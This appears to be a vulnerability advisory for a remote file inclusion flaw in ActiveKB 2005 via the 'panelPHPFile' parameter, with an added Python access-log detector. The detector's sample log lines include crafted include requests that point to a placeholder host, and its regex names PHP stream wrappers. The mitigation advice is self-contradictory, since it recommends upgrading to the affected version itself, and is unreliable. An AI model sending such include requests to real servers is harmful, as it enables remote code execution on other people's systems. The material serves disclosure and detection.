vendor: ActiveKB 2005
by: indoushka
CVSS: 9.3 (HIGH)
Remote File Inclusion (RFI)
CWE: 98
Product Name: ActiveKB 2005
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:activekb:activekb_2005
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005
RFI Vulnerability in ActiveKB 2005 1.0.0
A remote file inclusion (RFI) vulnerability exists in ActiveKB 2005 1.0.0. The vulnerable parameter is 'panelPHPFile', which is located in the 'class.template.php' file. An attacker can send a specially crafted HTTP request with a malicious file URL in the 'panelPHPFile' parameter, causing the application to include the remote file and execute the code it contains on the vulnerable system.
Mitigation:
Upgrade to the latest version of ActiveKB 2005 1.0.0 or apply the patch provided by the vendor.
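Until the patch is applied, web server access logs can be checked for requests that put a remote URL or stream wrapper into 'panelPHPFile'. The following detector is an added example, not code from the vendor or from the original advisory; it assumes combined-format access logs, and the sample log lines, the request directory and the host example.invalid are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "panelphpfile"  # parameter named in the advisory, compared case-insensitively

# Request field of a common/combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An include target that starts with a URL scheme, a stream wrapper or "//" is not a local panel file.
REMOTE = re.compile(r'^\s*(?:(?:https?|ftps?|php|data|expect)\s*:|//)', re.I)

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded URLs are still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (line_number, decoded_value) for each request whose panelPHPFile is remote."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            target = decode_fully(value)
            if name.lower() == PARAM and REMOTE.match(target):
                hits.append((number, target))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder host and directory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=4 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /class.template.php?panelPHPFile=http://example.invalid/x.txt HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /class.template.php?PanelPHPFile=hTTp%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 200 90',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /class.template.php?panelPHPFile=panels/menu.php HTTP/1.1" 200 734',
]

if __name__ == "__main__":
    for number, target in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: panelPHPFile -> {target}")
```

Access logs record only the query string, so a value sent in a POST body is not visible to this check.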